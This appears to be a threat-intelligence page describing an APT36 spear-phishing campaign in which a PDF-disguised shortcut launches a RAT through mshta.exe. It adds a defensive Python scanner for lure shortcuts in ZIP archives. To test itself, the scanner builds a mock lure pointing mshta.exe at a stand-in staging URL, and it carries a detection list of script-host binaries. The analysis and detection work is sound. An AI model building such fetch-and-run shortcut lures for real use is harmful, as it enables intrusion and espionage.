Transparent Tribe launches spear-phishing RAT campaign against Indian entities
Campaign
Summary
Transparent Tribe (APT36) has launched a fresh spear-phishing campaign against Indian governmental, academic, and strategic entities, raising the risk of persistent remote access on compromised systems. The lure is a ZIP archive carrying a Windows shortcut (LNK) file disguised as a PDF; opening it launches a remote access trojan (RAT) via mshta.exe, a signed Microsoft binary that runs HTML Application content and is therefore a common living-off-the-land stage. The malware chooses its persistence method according to the antivirus product present on the host and opens a decoy PDF to reduce suspicion. The activity fits the group's long-running espionage focus and shows continued operational refinement.
Related Happenings
CRESCENTHARVEST malicious .LNK espionage campaign targeting Iran protest supporters
Campaign
First: 19.02.2026 10:13
Last: 19.02.2026 10:13
Sources 1
About this happening:
The **CRESCENTHARVEST** campaign is using **malicious .LNK files** and social engineering to target **supporters of Iran's ongoing protests** for **information theft** and **long-...
CRESCENTHARVEST Windows RAT and info-stealer activity
Malware Activity
First: 19.02.2026 10:13
Last: 19.02.2026 10:13
Sources 1
About this happening:
The **CRESCENTHARVEST** malware activity centers on **version.dll**, a **Windows RAT and information stealer** that can execute commands, log keystrokes, and exfiltrate data. It m...
ClickFix DNS-based nslookup staging campaign
Campaign
First: 15.02.2026 16:10
Last: 15.02.2026 16:10
Sources 1
About this happening:
The **ClickFix** campaign has added **DNS-based staging** that uses **nslookup** in the **Windows Run dialog** to fetch and run a second-stage payload, making malicious execution...
Microsoft silently patches Windows LNK file remote code execution flaw (CVE-2025-9491)
Vulnerability
First: 12.02.2026 23:01
Last: 12.02.2026 23:01
Sources 1
About this happening:
**Windows LNK shortcut files** remain the focus of this vulnerability thread: **CVE-2025-9491** / **ZDI-CAN-25373** is being used in **September-October 2025** spear-phishing atta...
Lnk-it-up open-source suite for generating and detecting malicious Windows LNK shortcuts
Security Tool/Service
First: 12.02.2026 23:01
Last: 12.02.2026 23:01
Sources 1
About this happening:
**lnk-it-up** is a newly released open-source suite for **Windows LNK shortcuts** that helps testers generate deceptive files and helps defenders spot shortcuts where **Explorer**...
Timeline
02.01.2026 15:52 · 2 articles
Transparent Tribe targets Indian entities with spear-phishing RAT campaign
Initial Disclosure
A fresh spear-phishing campaign against Indian governmental, academic, and strategic entities is attributed to Transparent Tribe, also called APT36. The lure is a ZIP archive containing a LNK file disguised as a PDF; opening it launches a remote access trojan through mshta.exe. The infection chain decrypts and loads the RAT in memory, opens a decoy PDF to reduce suspicion, and selects a persistence method based on the antivirus product found on the victim host: a LNK or batch file in the Startup folder, with registry-based techniques as a fallback. The malware family supports remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control.
Sources:
- Transparent Tribe Launches New RAT Attacks Against Indian Government and Academia — thehackernews.com — 02.01.2026 15:52
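The lure described in the summary and in the timeline entry above is a shortcut (.lnk) named to look like a PDF, shipped inside a ZIP and pointing at mshta.exe. Windows Explorer never displays the .lnk extension, so a file called "Advisory.pdf.lnk" renders as "Advisory.pdf" with whatever icon the shortcut requests. The following Python is an added triage example, not code from the original page, from Transparent Tribe's tooling or from the cited report: it builds two constructed shortcuts from the MS-SHLLINK header layout (one mimicking the lure, one benign), packs them into an in-memory ZIP, and scans the archive for shortcuts that carry a document double extension, invoke mshta.exe or another script host, or borrow a document viewer's icon. The file names, the example.invalid URL and the detection heuristics are assumptions chosen for illustration.

```python
"""Scan a ZIP archive for shortcut (.lnk) lures that pose as documents and
launch mshta.exe. Added example; the shortcuts it scans are constructed
inline from the MS-SHLLINK layout and are not real campaign artefacts."""
import io
import struct
import zipfile

# ShellLinkHeader CLSID {00021401-0000-0000-C000-000000000046}, little-endian on disk
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO = 0x01, 0x02
HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x04, 0x08, 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                 (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))  # StringData order per spec
LOLBINS = ("mshta", "rundll32", "regsvr32", "wscript", "cscript", "powershell", "cmd")  # heuristic list
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt")
VIEWER_HINTS = ("acrord32", "winword", "excel")  # icon paths that make a shortcut look like a document


def _string_data(s):
    """CountCharacters (uint16) followed by UTF-16LE characters, no terminator."""
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(rel_path, args="", icon=""):
    """Build a minimal unicode shortcut: 76-byte header, no IDList/LinkInfo, then StringData."""
    flags = HAS_RELPATH | IS_UNICODE | (HAS_ARGS if args else 0) | (HAS_ICON if icon else 0)
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<II", flags, 0)  # size, CLSID, flags, attrs
    header += b"\x00" * 24  # creation/access/write FILETIMEs
    header += struct.pack("<IIIHHII", 0, 0, 1, 0, 0, 0, 0)  # FileSize, IconIndex, ShowCommand, HotKey, reserved
    body = _string_data(rel_path) + (_string_data(args) if args else b"") + (_string_data(icon) if icon else b"")
    return header + body


def parse_lnk(data):
    """Return the StringData fields of a shortcut, or None if the bytes are not a shortcut."""
    if len(data) < 76 or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        return None
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 76
    if flags & HAS_IDLIST:  # skip IDListSize + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:  # skip LinkInfo by its declared size
        off += struct.unpack_from("<I", data, off)[0]
    out = {key: "" for _, key in STRING_FIELDS}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        n = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            out[key] = data[off:off + 2 * n].decode("utf-16-le", "replace")
            off += 2 * n
        else:
            out[key] = data[off:off + n].decode("cp1252", "replace")
            off += n
    return out


def assess(name, lnk):
    """Return the reasons a shortcut looks like a document lure (empty list if none)."""
    reasons = []
    low = name.lower()
    stem = low[:-4] if low.endswith(".lnk") else low
    if low.endswith(".lnk") and stem.endswith(DOC_EXTS):
        reasons.append("double extension: shortcut posing as a document")
    cmdline = (lnk["relative_path"] + " " + lnk["arguments"]).lower()
    for binary in LOLBINS:
        if binary in cmdline:
            reasons.append("target invokes " + binary)
            break
    if any(hint in lnk["icon_location"].lower() for hint in VIEWER_HINTS):
        reasons.append("icon borrowed from a document viewer")
    return reasons


def scan_zip(zip_bytes):
    """Return [(member name, [reasons])] for every suspicious shortcut in the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            lnk = parse_lnk(zf.read(info.filename))
            if lnk is None:
                continue
            reasons = assess(info.filename, lnk)
            if not info.filename.lower().endswith(".lnk"):
                reasons.append("shortcut content under a non-.lnk name")
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def build_sample_archive():
    """Constructed archive: one lure shortcut, its decoy PDF, and one benign shortcut."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Advisory.pdf.lnk", build_lnk(
            r"..\..\..\Windows\System32\mshta.exe",
            "https://example.invalid/decoy.hta",  # hypothetical staging URL
            r"%ProgramFiles%\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"))
        zf.writestr("Advisory.pdf", b"%PDF-1.4\n% constructed decoy\n")
        zf.writestr("Notes.lnk", build_lnk(r"..\Documents\Notes.txt"))
    return buf.getvalue()


if __name__ == "__main__":
    for member, why in scan_zip(build_sample_archive()):
        print(member, "->", "; ".join(why))
```

Pass the bytes of a real archive to scan_zip to triage it. The parser skips the LinkTargetIDList and LinkInfo blocks by their declared sizes, which is enough to reach the StringData in shortcuts written by Explorer or by common tooling; if a sample corrupts those sizes the string fields come back as noise, but the name-based double-extension check still fires. Since this campaign persists through a shortcut or batch file in the Startup folder, running assess over the shortcuts found there is a useful host-side complement to scanning the incoming archive.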